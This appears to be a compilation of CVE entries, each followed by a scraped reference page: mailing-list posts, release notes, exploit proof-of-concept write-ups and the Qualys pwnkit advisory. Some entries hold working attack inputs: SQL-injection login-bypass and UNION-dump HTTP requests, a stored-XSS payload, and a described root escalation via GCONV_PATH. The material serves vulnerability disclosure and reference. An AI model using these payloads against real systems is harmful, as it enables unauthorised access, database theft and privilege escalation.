perM 0.4.0 has a Buffer Overflow related to strncpy. (Debian initially fixed this in 0.4.0-7.)

*   _To_: debian-med@lists.debian.org
*   _Subject_: Re: Autopkgtest for perm
*   _From_: Nilesh Patra <nilesh@tchncs.de\>
*   _Date_: Mon, 2 Aug 2021 18:44:55 +0530
*   _Message-id_: <\[🔎\] 89b79cf7-8163-5986-8746-4ba065cafdca@tchncs.de\>
*   _In-reply-to_: <\[🔎\] 20210802130013.GX25911@an3as.eu\>
*   _References_: <\[🔎\] CAJFurRRrERrOccMGHRm2ghj=6fmu5AD3Nm8HXRfeYRpO4bhG5g@mail.gmail.com\> <\[🔎\] 20210802130013.GX25911@an3as.eu\>

On 8/2/21 6:30 PM, Andreas Tille wrote:
> Hi Shruti,
> 
> On Mon, Aug 02, 2021 at 04:50:36PM +0530, Shruti Sridhar wrote:
>> I have written autopkgtests for perm\[1\]
>>
>> The package initially failed blhc in the pipeline but when I fixed the
>> error \[2\]

Congratulations, you found a security issue as it seems.
I'm happy that enabling blhc is doing a sensible job

>> the autopkgtest which was initially working fails \[3\].
> 
> The autopkgtest says:
> 
> Info 3: Sortubg buckets using 2 CPUs                                          .
> \*\*\* buffer overflow detected \*\*\*: terminated
> Info 3: Successfully made the index
> 
> My guess is that enabling hardening options has uncovered some memory leak.
> I'd recommend firing up gdb and try finding the issue.

The basic problem is that it has several instances of strcpy and sprintf, which are
famously known for causing buffer overflows.

I think the sensible option is to replace these with strlcpy and strcat when needed.

But the problem is that the code needs a lot of refactoring, rewriting and debugging to get these things in properly.
So I am tempted to say that we should consider to remove perm from the archive.
Upstream is dead, and I do not think it is worth keeping this in anymore

What do you think?

Nilesh

**Attachment: OpenPGP\_signature**  
_Description:_ OpenPGP digital signature

**Reply to:**

*   debian-med@lists.debian.org
*   Nilesh Patra (on-list)
*   Nilesh Patra (off-list)

*   **Follow-Ups**:
    *   **Re: Autopkgtest for perm**
        *   _From:_ Nilesh Patra <nilesh@tchncs.de>

*   **References**:
    *   **Autopkgtest for perm**
        *   _From:_ Shruti Sridhar <shruti.sridhar99@gmail.com>
    *   **Re: Autopkgtest for perm**
        *   _From:_ Andreas Tille <andreas@an3as.eu>

*   Prev by Date: **Re: Autopkgtest for perm**
*   Next by Date: **Re: Autopkgtest for perm**
*   Previous by thread: **Re: Autopkgtest for perm**
*   Next by thread: **Re: Autopkgtest for perm**
*   Index(es):
    *   **Date**
    *   **Thread**

CVE-2021-38172: Re: Autopkgtest for perm

The config restore function of Voipmonitor GUI before v24.96 does not properly check files sent as restore archives, allowing remote attackers to execute arbitrary commands via a crafted file in the web root.

CVE-2022-24262: News - VoIPmonitor

Mastodon before 3.3.2 and 3.4.x before 3.4.6 has incorrect access control because it does not compact incoming signed JSON-LD activities. (JSON-LD signing has been supported since version 1.6.0.)

![Mastodon](https://camo.githubusercontent.com/151e1927aa71042bef4528c6e8a848b83ecda374a27297111d42f69d5a1f649d/68747470733a2f2f692e696d6775722e636f6d2f4e685a6334306c2e706e67)

> ⚠️ This release is an important security release fixing CVE-2022-24307, **a critical security issue**.
> 
> A corresponding security release is also available for the 3.4.x branch, which is the recommended release.

**Changelog****Fixed**

*   Fix `mastodon:webpush:generate_vapid_key` task requiring a functional environment (ClearlyClaire)
*   Fix spurious errors when receiving an Add activity for a private post (ClearlyClaire)

**Security**

*   Fix error-prone SQL queries (ClearlyClaire)
*   Fix not compacting incoming signed JSON-LD activities (puckipedia, ClearlyClaire) (CVE-2022-24307)
*   Fix insufficient sanitization of report comments (ClearlyClaire)
*   Fix stop condition of a Common Table Expression (ClearlyClaire)
*   Disable legacy XSS filtering (Wonderfall)

**Upgrade notes**

Because this is a backport, it is not available with `git pull`. Use `git fetch && git checkout v3.3.2`

> As always, **make sure you have backups of the database before performing any upgrades**. If you are using docker-compose, this is how a backup command might look: docker exec mastodon\_db\_1 pg\_dump -Fc -U postgres postgres > name\_of\_the\_backup.dump

**Dependencies**

External dependencies have not changed compared to v3.3.1, the compatible Ruby, PostgreSQL, Node, Elasticsearch and Redis versions are the same, that is:

*   Ruby: 2.5 to 2.7
*   PostgreSQL: 9.4 or newer
*   Elasticsearch (optional, for full-text search): 5.x, 6.x or 7.x
*   Redis: 4 or newer
*   Node:
    *   Node 10: 10.0 or newer
    *   Node 12: 12.16 or newer
    *   Node 13: 13.9 or newer
    *   Node 14: 14.5 or newer

Compared to 3.3.0, an additional system dependency is required: `shared-mime-info`, which is likely already installed on your system.  
On Debian-based systems, it can be installed using `apt install shared-mime-info`.

**Update steps**

The following instructions are for updating from 3.3.2.

If you are upgrading directly from an earlier release, please carefully read the upgrade notes for the skipped releases as well, as they often require extra steps such as database migrations.

**Non-Docker**

If you're upgrading from before 3.3.2, make sure you have `shared-mime-info` installed (`apt install shared-mime-info`).

1.  Pull the code: `git fetch && git checkout v3.3.2`
2.  Restart `mastodon-web` and `mastodon-sidekiq`:  
    `systemctl reload mastodon-web`  
    `systemctl restart mastodon-sidekiq`

**Docker**

The exact steps depend on your setup, but they are likely to match the following:

1.  Pull the code: `git fetch && git checkout v3.3.2`
2.  Pull the prebuilt images: `docker-compose pull`, or, alternatively, build them yourself: `docker-compose build --pull`
3.  Restart all Mastodon processes: `docker-compose up -d`

CVE-2022-24307: Release v3.3.2 · mastodon/mastodon

SQL Injection vulnerability exists in Sourcecodester Simple Client Management System 1.0 via the username field in login.php.

Permalink

Cannot retrieve contributors at this time

\# Exploit Title: Simple Client Management System 1.0 - SQL injection (Authentication Bypass)

\# Date: 27/01/2022

\# Exploit Author: Rahul Kalnarayan (r4hn1)

\# Vendor Homepage: https://www.sourcecodester.com/

\# Software Link: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html

\# Version: 1.0

\# Category: Webapps

\# Tested on: Apache2+MariaDB latest version

\# Description : Simple Client Management System 1.0 suffers from SQL injection vulnerability, allowing an un-authenticated user to login admin panel.

\# CVE ID: CVE-2021-43510

Vulnerable Page: /crm/admin/

POC-Request

\-----------------------------------

POST /cms/classes/Login.php?f=login HTTP/1.1

Host: 192.168.1.76

Content-Length: 31

Accept: \*/\*

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Origin: http://192.168.1.76

Referer: http://192.168.1.76/cms/admin/login.php

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Connection: close

username=admin'+or+'1'%3d'1'--+-&password=as

\---------------------------------------

POC-Response

HTTP/1.1 200 OK

Date: Thu, 27 Jan 2022 17:29:08 GMT

Server: Apache/2.4.38 (Debian)

Set-Cookie: PHPSESSID=1s27q3saavhi3jc8lndng66tlt; path=/; secure

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate

Pragma: no-cache

Content-Length: 20

Connection: close

Content-Type: text/html; charset=UTF-8

{"status":"success"}

CVE-2021-43510: Simple-Client-Management-System-Exploit/CVE-2021-43510 at main · r4hn1/Simple-Client-Management-System-Exploit

SQL Injection vulnerability exists in Sourcecodester Simple Client Management System 1.0 via the id parameter in view-service.php.

Permalink

Cannot retrieve contributors at this time

\# Exploit Title: Simple Client Management System 1.0 - Unauthenticated SQL injection (view\_service.php)

\# Date: 27/01/2022

\# Exploit Author: Rahul Kalnarayan (r4hn1)

\# Vendor Homepage: https://www.sourcecodester.com/

\# Software Link: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html

\# Version: 1.0

\# Category: Webapps

\# Tested on: Apache2+MariaDB latest version

\# Description : Simple Client Management System 1.0 suffers from SQL injection vulnerability, allowing an un-authenticated user to dump databse.

Vulnerable Page: /cms/admin/maintenance/view\_service.php

POC-Request

\-----------------------------------

GET /cms/admin/maintenance/view\_service.php?id=9999%27%20union%20all%20select%20null,null,concat(database()),null,null,null,null--+ HTTP/1.1

Host: 192.168.1.76

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Connection: close

\---------------------------------------

POC-Response

HTTP/1.1 200 OK

Date: Thu, 27 Jan 2022 17:34:55 GMT

Server: Apache/2.4.38 (Debian)

Set-Cookie: PHPSESSID=radrun69h6fsn08bd53b8spsvq; path=/; secure

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate

Pragma: no-cache

Vary: Accept-Encoding

Content-Length: 1469

Connection: close

Content-Type: text/html; charset=UTF-8

<style>

#uni\_modal .modal-footer{

display:none;

}

</style>

<div class="container-fluid" id="print\_out">

<div id='transaction-printable-details' class='position-relative'>

<div class="row">

<fieldset class="w-100">

<div class="col-12">

<dl>

<dt class="text-info">Name:</dt>

<dd class="pl-3"></dd>

<dt class="text-info">Description:</dt>

<dd class="pl-3">cms\_db</dd>

<dt class="text-info">Price:</dt>

<dd class="pl-3"></dd>

<dt class="text-info">Status:</dt>

<dd class="pl-3">

<span class="badge badge-danger rounded-pill">Inactive</span>

</dd>

</dl>

</div>

</fieldset>

</div>

</div>

</div>

<div class="form-group">

<div class="col-12">

<div class="d-flex justify-content-end align-items-center">

<button class="btn btn-dark btn-flat" type="button" id="cancel" data-dismiss="modal">Close</button>

</div>

</div>

</div>

<script>

$(function(){

$('.table td,.table th').addClass('py-1 px-2 align-middle')

})

</script>

CVE-2021-43509: Simple-Client-Management-System-Exploit/CVE-2021-43509 at main · r4hn1/Simple-Client-Management-System-Exploit

The Ninja Tables WordPress plugin before 4.1.8 does not sanitise and escape some of its table fields, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed

**WordPress Ninja Tables 4.1.7 Cross Site Scripting**

Posted Oct 25, 2021

Authored by Akash Rajendra Patil

WordPress Ninja Tables plugin version 4.1.7 suffers from a persistent cross site scripting vulnerability.

tags | exploit, xss

MD5 | `1ee321f04776c466b3590854bba610c6`

Download | Favorite | View

**WordPress Ninja Tables 4.1.7 Cross Site Scripting**

    # Exploit Title: WordPress Plugin Ninja Tables 4.1.7 - Stored Cross-Site Scripting (XSS)# Date: 25-10-2021# Exploit Author: Akash Rajendra Patil# Vendor Homepage: https://wordpress.org/plugins/ninja-tables/# Software Link: https://wpmanageninja.com/downloads/ninja-tables-pro-add-on/# Version: 4.1.7# Tested on Windows*How to reproduce vulnerability:*1. Install Latest WordPress2. Install and activate Ninja Tables <= 4.1.73. Enter JavaScript payload which is mentioned below"><img src=x onerror=confirm(docment.domain)> in the 'Coulmn Name & Add Data'and enter the data into the user input field.Then Navigate to Table Design5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality in that time JavaScript payload is executing successfully and we are getting a pop-up.

**File Tags**

*   ActiveX (932)
*   Advisory (76,655)
*   Arbitrary (14,946)
*   BBS (2,859)
*   Bypass (1,518)
*   CGI (1,009)
*   Code Execution (6,477)
*   Conference (667)
*   Cracker (797)
*   CSRF (3,247)
*   DoS (21,554)
*   Encryption (2,320)
*   Exploit (49,159)
*   File Inclusion (4,121)
*   File Upload (933)
*   Firewall (821)
*   Info Disclosure (2,531)
*   Intrusion Detection (845)
*   Java (2,745)
*   JavaScript (789)
*   Kernel (5,904)
*   Local (13,904)
*   Magazine (586)
*   Overflow (12,045)
*   Perl (1,409)
*   PHP (5,024)
*   Proof of Concept (2,273)
*   Protocol (3,233)
*   Python (1,365)
*   Remote (29,340)
*   Root (3,428)
*   Ruby (564)
*   Scanner (1,628)
*   Security Tool (7,635)
*   Shell (3,014)
*   Shellcode (1,192)
*   Sniffer (877)
*   Spoof (2,064)
*   SQL Injection (15,868)
*   TCP (2,345)
*   Trojan (666)
*   UDP (865)
*   Virus (657)
*   Vulnerability (30,162)
*   Web (8,870)
*   Whitepaper (3,701)
*   x86 (939)
*   XSS (17,211)
*   Other

**File Archives**

*   January 2022
*   December 2021
*   November 2021
*   October 2021
*   September 2021
*   August 2021
*   July 2021
*   June 2021
*   May 2021
*   April 2021
*   March 2021
*   February 2021
*   Older

**Systems**

*   AIX (423)
*   Apple (1,860)
*   BSD (368)
*   CentOS (55)
*   Cisco (1,909)
*   Debian (5,947)
*   Fedora (1,690)
*   FreeBSD (1,241)
*   Gentoo (4,150)
*   HPUX (875)
*   iOS (311)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (41,376)
*   Mac OS X (682)
*   Mandriva (3,105)
*   NetBSD (255)
*   OpenBSD (476)
*   RedHat (10,982)
*   Slackware (941)
*   Solaris (1,601)
*   SUSE (1,444)
*   Ubuntu (7,593)
*   UNIX (9,015)
*   UnixWare (182)
*   Windows (6,265)
*   Other

CVE-2021-24900: WordPress Ninja Tables 4.1.7 Cross Site Scripting ≈ Packet Storm

xterm through Patch 370, when Sixel support is enabled, allows attackers to trigger a buffer overflow in set_sixel in graphics_sixel.c via crafted text.

CVE-2022-24130: XTERM - Change Log

Signiant Manager+Agents before 15.1 allows XML External Entity (XXE) attacks.

Updated December 13, 2021

**What's New in Manager+Agents 15.1**

This version of Manager+Agents includes usability improvements, bug fixes, and software architecture improvements resulting in better performance and improved security.

In this release:

*   **New Agent Picker**: A new Agent picker has been added to Media Mover jobs, Agent reports, Agent upgrades, and Manager backups to Agents, allowing you to easily select multiple Agents at a time.
    
*   **Object Mover Jobs**: ObjectDropBox and ObjectUploader job templates now support the ability to move source data after a transfer completes.
    
*   **Job Retrying**: Object Mover jobs that fail due to lack of available system resources are now retried on the next available Agent.
    
*   **Job Creation** Object Mover and Media Mover templates now have conditional prompting to make job creation easier.
    
*   **Field Notes**: You can now add Field Notes to Agent, Boolean, and PickList prompts on custom job templates.
    
*   **REST API Improvements**: The REST API now allows you to set job labels.
    
*   **REST API Documentation**: The native REST API documentation has been updated to provide better and more complete examples.
    
*   **Agent List Improvements**: In the Agent List, you can now choose to stop monitoring unreachable Agents.
    
*   **Agent Operating System Changes**: Added support for Ubuntu 20.04 LTS Agents.
    
*   **Agent Hardware Changes**: Added support for Apple M1 CPUs on macOS Agents.
    
*   **Manager and Agent Operating System Changes**: Added support for Rocky Linux 8.4.
    
*   **Active Filename**: Jobs now display the **Active Filename** of the file currently being transferred.
    
*   **Active Filename**: Job and Agent queues in resource controls can now display an **Active Filename** column to show which file is currently being transferred.
    
*   **Job Queueing**: Job queuing management has been improved to allow you to easily reorder jobs in the job queue.
    
*   **File Metadata**: Jobs now have the option to preserve the original file creation date after being transferred to a destination.
    
*   **File Suffix**: Jobs now have the option to add a suffix to new versions of files that have been previously transferred with the same name.
    
*   **Workflow Gateway**: Workflow Gateway has been improved to allow file filtering based on the source file date.
    
*   **Health Checks**: System health checks have been improved to include more information and details.
    

**Bug Fixes**

*   Fixed issues in the Windows installer related to the progress bar, installation summary, and uninstall process.
    
*   Fixed an issue where the **Data Transferred** incorrectly displayed the **Total Data** value.
    
*   Fixed an issue where the Agent version would not update on the Agent List after upgrading the Agent.
    
*   Fixed an issue in job views and reports related to date preferences not being preserved.
    
*   Fixed an issue with Media Mover related to the **Skip Source File Not Found On Send** prompt causing jobs to fail.
    
*   Fixed an issue that did not release TCP connections from Agents using version 14.0 or earlier when using Agent monitoring.
    
*   Fixed an issue where Windows Manager backups would not check for free disk space before trying to restore the system.
    
*   Fixed an issue where the job status would not show the correct status when a Windows backup failed.
    
*   Fixed an issue that prevented Workflow Gateway from working after restoring a Windows backup.
    
*   Security improvements to prevent potential XML External Entity and Cross Domain attacks.
    
    **Note**: The security improvements are available to all supported versions of the Manager software. If you are using version 14.1 or higher, it is recommended you download and install the latest bundle to ensure your system is secure. If you are using an earlier version, contact Signiant Customer Support for assistance migrating to a newer version.
    

**Perl Upgrade**

New installations of Manager+Agents version 15.1 include Perl version 5.32.1 to improve performance and security. Existing Manager+Agents deployments upgrading to version 15.1 will remain on the same version of Perl and can be manually updated. For more information see Upgrading Perl Versions in Manager+Agents 15.1.

**Upgrade Path**

This upgrade can be installed on Manager+Agents 13.1 or higher. Previous versions must upgrade to 13.1 before upgrading to this version. Contact Signiant Customer Support for more information.

**Agent Configurations**

Upgrading Manager+Agents does not preserve additional Agent configuration files other than `sigsetup.inf`. To save your additional configuration files, back up all INF files contained within the Agent `hosts` directory.

*   Linux: `usr/signiant/dds/3rdparty/jboss/server/default/deploy/signiant.war/secure/hosts/`
    
*   Windows: `C:\Program Files\Signiant\Mobilize\3rdparty\jboss\server\default\deploy\signiant.war\secure\hosts\`
    

**End of Life Announcements**

Manager+Agents 15.1 includes changes to the supported operating systems and deployment options. For more information, contact Signiant Customer Support.

**End of Agent Support for Debian Linux 8 / Ubuntu Linux 17**

Agent software no longer supports Debian Linux 8 and Ubuntu Linux 17. To upgrade to the latest version of Manager+Agents, you must upgrade any Debian or Ubuntu Linux Agents to a supported operating system.

**End of Agent Support for Apple macOS 10.13 and earlier**

Agent software no longer supports Apple macOS 10.13 (High Sierra) or earlier. To upgrade to the latest version of Manager+Agents, you must upgrade any macOS agents to version 10.14 (Mojave) or higher.

**End of Life Reminders**

The following Manager+Agents solutions are no longer supported and may require assistance from Signiant Customer Support to upgrade to a newer version of Manager+Agents.

**Manager+Agents supported Media Shuttle portals**

Manager+Agents backed Media Shuttle deployments are no longer supported. For more information, contact Signiant Customer Support for assistance migrating your Media Shuttle deployment to the cloud native Signiant Media Shuttle, which provides additional features and functionality to Media Shuttle.

**Manager+Agents supported Media Exchange**

Media Exchange deployments are not supported by Manager+Agents 15.0 or higher. To continue using Media Exchange, remain at Manager+Agents 14.1 or earlier.

**Web Transfer API**

**Web Transfer API** is not supported by Manager+Agents 15.0 or higher. To continue using Agents as TAPI-enabled servers, remain at Manager+Agents 14.1 or earlier.

CVE-2021-46660: Release Notes for Manager+Agents | Signiant Help

A local privilege escalation vulnerability was found on polkit's pkexec utility. The pkexec application is a setuid tool designed to allow unprivileged users to run commands as privileged users according predefined policies. The current version of pkexec doesn't handle the calling parameters count correctly and ends trying to execute environment variables as commands. An attacker can leverage this by crafting environment variables in such a way it'll induce pkexec to execute arbitrary code. When successfully executed the attack can cause a local privilege escalation given unprivileged users administrative rights on the target machine.

Qualys Security Advisory pwnkit: Local Privilege Escalation in polkit's pkexec (CVE-2021-4034) ======================================================================== Contents ======================================================================== Summary Analysis Exploitation Acknowledgments Timeline ======================================================================== Summary ======================================================================== We discovered a Local Privilege Escalation (from any user to root) in polkit's pkexec, a SUID-root program that is installed by default on every major Linux distribution: "Polkit (formerly PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged ones. \[...\] It is also possible to use polkit to execute commands with elevated privileges using the command pkexec followed by the command intended to be executed (with root permission)." (Wikipedia) This vulnerability is an attacker's dream come true: - pkexec is installed by default on all major Linux distributions (we exploited Ubuntu, Debian, Fedora, CentOS, and other distributions are probably also exploitable); - pkexec is vulnerable since its creation, in May 2009 (commit c8c3d83, "Add a pkexec(1) command"); - any unprivileged local user can exploit this vulnerability to obtain full root privileges; - although this vulnerability is technically a memory corruption, it is exploitable instantly, reliably, in an architecture-independent way; - and it is exploitable even if the polkit daemon itself is not running. We will not publish our exploit immediately; however, please note that this vulnerability is trivially exploitable, and other researchers might publish their exploits shortly after the patches are available. If no patches are available for your operating system, you can remove the SUID-bit from pkexec as a temporary mitigation; for example: # chmod 0755 /usr/bin/pkexec This vulnerability is one of our most beautiful discoveries; to honor its memory, we recommend listening to DJ Pone's "Falken's Maze" (double pun intended) while reading this advisory. Thank you very much! ======================================================================== Analysis ======================================================================== pkexec is a sudo-like, SUID-root program, described as follows by its man page: ------------------------------------------------------------------------ NAME pkexec - Execute a command as another user SYNOPSIS pkexec \[--version\] \[--disable-internal-agent\] \[--help\] pkexec \[--user username\] PROGRAM \[ARGUMENTS...\] DESCRIPTION pkexec allows an authorized user to execute PROGRAM as another user. If PROGRAM is not specified, the default shell will be run. If username is not specified, then the program will be executed as the administrative super user, root. ------------------------------------------------------------------------ The beginning of pkexec's main() function processes the command-line arguments (lines 534-568), and searches for the program to be executed (if its path is not absolute) in the directories of the PATH environment variable (lines 610-640): ------------------------------------------------------------------------ 435 main (int argc, char \*argv\[\]) 436 { ... 534 for (n = 1; n < (guint) argc; n++) 535 { ... 568 } ... 610 path = g\_strdup (argv\[n\]); ... 629 if (path\[0\] != '/') 630 { ... 632 s = g\_find\_program\_in\_path (path); ... 639 argv\[n\] = path = s; 640 } ------------------------------------------------------------------------ Unfortunately, if the number of command-line arguments argc is 0 (if the argument list argv that we pass to execve() is empty, i.e. {NULL}), then argv\[0\] is NULL (the argument list's terminator) and: - at line 534, the integer n is permanently set to 1; - at line 610, the pointer path is read out-of-bounds from argv\[1\]; - at line 639, the pointer s is written out-of-bounds to argv\[1\]. But what exactly is read from and written to this out-of-bounds argv\[1\]? To answer this question, we must digress briefly. When we execve() a new program, the kernel copies our argument and environment strings and pointers (argv and envp) to the end of the new program's stack; for example: |---------+---------+-----+------------|---------+---------+-----+------------| | argv\[0\] | argv\[1\] | ... | argv\[argc\] | envp\[0\] | envp\[1\] | ... | envp\[envc\] | |----|----+----|----+-----+-----|------|----|----+----|----+-----+-----|------| V V V V V V "program" "-option" NULL "value" "PATH=name" NULL Clearly (because the argv and envp pointers are contiguous in memory), if argc is 0, then the out-of-bounds argv\[1\] is actually envp\[0\], the pointer to our first environment variable, "value". Consequently: - at line 610, the path of the program to be executed is read out-of-bounds from argv\[1\] (i.e. envp\[0\]), and points to "value"; - at line 632, this path "value" is passed to g\_find\_program\_in\_path() (because "value" does not start with a slash, at line 629); - g\_find\_program\_in\_path() searches for an executable file named "value" in the directories of our PATH environment variable; - if such an executable file is found, its full path is returned to pkexec's main() function (at line 632); - and at line 639, this full path is written out-of-bounds to argv\[1\] (i.e. envp\[0\]), thus overwriting our first environment variable. More precisely: - if our PATH environment variable is "PATH=name", and if the directory "name" exists (in the current working directory) and contains an executable file named "value", then a pointer to the string "name/value" is written out-of-bounds to envp\[0\]; - or, if our PATH is "PATH=name=.", and if the directory "name=." exists and contains an executable file named "value", then a pointer to the string "name=./value" is written out-of-bounds to envp\[0\]. In other words, this out-of-bounds write allows us to re-introduce an "unsecure" environment variable (for example, LD\_PRELOAD) into pkexec's environment; these "unsecure" variables are normally removed (by ld.so) from the environment of SUID programs before the main() function is called. We will exploit this powerful primitive in the following section. Last-minute note: polkit also supports non-Linux operating systems such as Solaris and \*BSD, but we have not investigated their exploitability; however, we note that OpenBSD is not exploitable, because its kernel refuses to execve() a program if argc is 0. ======================================================================== Exploitation ======================================================================== Our question is: to successfully exploit this vulnerability, which "unsecure" variable should we re-introduce into pkexec's environment? Our options are limited, because shortly after the out-of-bounds write (at line 639), pkexec completely clears its environment (at line 702): ------------------------------------------------------------------------ 639 argv\[n\] = path = s; ... 657 for (n = 0; environment\_variables\_to\_save\[n\] != NULL; n++) 658 { 659 const gchar \*key = environment\_variables\_to\_save\[n\]; ... 662 value = g\_getenv (key); ... 670 if (!validate\_environment\_variable (key, value)) ... 675 } ... 702 if (clearenv () != 0) ------------------------------------------------------------------------ The answer to our question comes from pkexec's complexity: to print an error message to stderr, pkexec calls the GLib's function g\_printerr() (note: the GLib is a GNOME library, not the GNU C Library, aka glibc); for example, the functions validate\_environment\_variable() and log\_message() call g\_printerr() (at lines 126 and 408-409): ------------------------------------------------------------------------ 88 log\_message (gint level, 89 gboolean print\_to\_stderr, 90 const gchar \*format, 91 ...) 92 { ... 125 if (print\_to\_stderr) 126 g\_printerr ("%s\\n", s); ------------------------------------------------------------------------ 383 validate\_environment\_variable (const gchar \*key, 384 const gchar \*value) 385 { ... 406 log\_message (LOG\_CRIT, TRUE, 407 "The value for the SHELL variable was not found the /etc/shells file"); 408 g\_printerr ("\\n" 409 "This incident has been reported.\\n"); ------------------------------------------------------------------------ g\_printerr() normally prints UTF-8 error messages, but it can print messages in another charset if the environment variable CHARSET is not UTF-8 (note: CHARSET is not security sensitive, it is not an "unsecure" environment variable). To convert messages from UTF-8 to another charset, g\_printerr() calls the glibc's function iconv\_open(). To convert messages from one charset to another, iconv\_open() executes small shared libraries; normally, these triplets ("from" charset, "to" charset, and library name) are read from a default configuration file, /usr/lib/gconv/gconv-modules. Alternatively, the environment variable GCONV\_PATH can force iconv\_open() to read another configuration file; naturally, GCONV\_PATH is one of the "unsecure" environment variables (because it leads to the execution of arbitrary libraries), and is therefore removed by ld.so from the environment of SUID programs. Unfortunately, CVE-2021-4034 allows us to re-introduce GCONV\_PATH into pkexec's environment, and to execute our own shared library, as root. Important: this exploitation technique leaves traces in the logs (either "The value for the SHELL variable was not found the /etc/shells file" or "The value for environment variable \[...\] contains suscipious content"). However, please note that this vulnerability is also exploitable without leaving any traces in the logs, but this is left as an exercise for the interested reader. For further discussions about pkexec, GLib, and GCONV\_PATH, please refer to the following posts by Tavis Ormandy, Jakub Wilk, and Yuki Koike: https://www.openwall.com/lists/oss-security/2014/07/14/1 https://www.openwall.com/lists/oss-security/2017/06/23/8 https://hugeh0ge.github.io/2019/11/04/Getting-Arbitrary-Code-Execution-from-fopen-s-2nd-Argument/ ======================================================================== Acknowledgments ======================================================================== We thank polkit's authors, Red Hat Product Security, and the members of distros@openwall for their invaluable help with the disclosure of this vulnerability. We also thank Birdy Nam Nam for their inspiring work. ======================================================================== Timeline ======================================================================== 2021-11-18: Advisory sent to secalert@redhat. 2022-01-11: Advisory and patch sent to distros@openwall. 2022-01-25: Coordinated Release Date (5:00 PM UTC).

Tag

#debian